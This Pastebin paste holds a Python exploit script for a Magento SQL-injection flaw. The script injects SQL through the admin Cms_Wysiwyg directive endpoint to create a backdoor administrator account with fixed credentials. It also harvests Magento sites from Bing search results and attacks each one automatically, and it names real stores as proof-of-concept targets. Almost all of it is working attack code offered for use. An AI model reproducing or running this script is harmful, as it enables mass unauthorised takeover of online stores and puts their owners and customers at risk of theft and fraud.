Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- '''
- POC Sites:
- www.anandindia.in
- goyalglassware.com
- ishopping.pk
- value.pk
- References:
- http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
- '''
- try:
- from urlparse import urlsplit
- import requests, base64, sys, re, os
- except:
- exit("\n\n[-] Import Error !\n")
- def Exploit(url):
- final_url = "http://" + url + "/admin/Cms_Wysiwyg/directive/index/"
- q = """
- SET @SALT = 'rp';
- SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
- SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
- INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
- INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
- """
- query = q.replace("\n", "").format(username="stoker", password="secret")
- pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
- r = requests.post(final_url,
- data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
- "filter": base64.b64encode(pfilter),
- "forwarded": 1})
- if r.ok:
- print "\n -- > [{0}/admin] Credentials: ['stoker' : 'secret']".format(url)
- else:
- print " [-] {0} Not Vulnerable".format(url)
- def main():
- # Change Dork in Bing URL if u need to modify it !
- # Google Will also Work Same, infact more better if you use
- # inurl:js/magentothem/
- # dork, but it'll ask you to enter captcha after multiple requests from the same ip
- # i'm too lazy to play with that, so i gone ahead with bing.
- # Bing's instreamUrl:Title:URL is not gonna work Here !
- response = requests.get('http://www.bing.com/search?q=Powered+by+Magento+site%3Apk')
- URLs = re.findall(r'href=[\'"]?([^\'" >]+)', response.content) # Old Friend :P
- URLS_LIST = [] # Container for Bitches !
- for url in URLs:
- baseUrl = urlsplit(url).netloc # meet your requirements ;)
- if len(baseUrl) != 0: # Cheaters Not Allowed !
- URLS_LIST.append(baseUrl) # Load Bitches
- for uri in set(URLS_LIST):
- Exploit(uri) # Bang Bang Bang
- if __name__ == '__main__':
- os.system('cls')
- try:
- print '''\n
- -------------------------------------------------
- Title: Magento Auth Exploit !
- Author: Muhammad Adeel
- Mail: Chaudhary1337@gmail.com
- Blog: http://urdusecurity.blogspot.com
- -------------------------------------------------\n\n
- '''
- main()
- except:
- exit("\nErrrrrrrrrrrrrrrrroooooooooooooooooooooorrrrrrrrrrrrrrrrrrrrrrrrrrr !!!")
Add Comment
Please, Sign In to add comment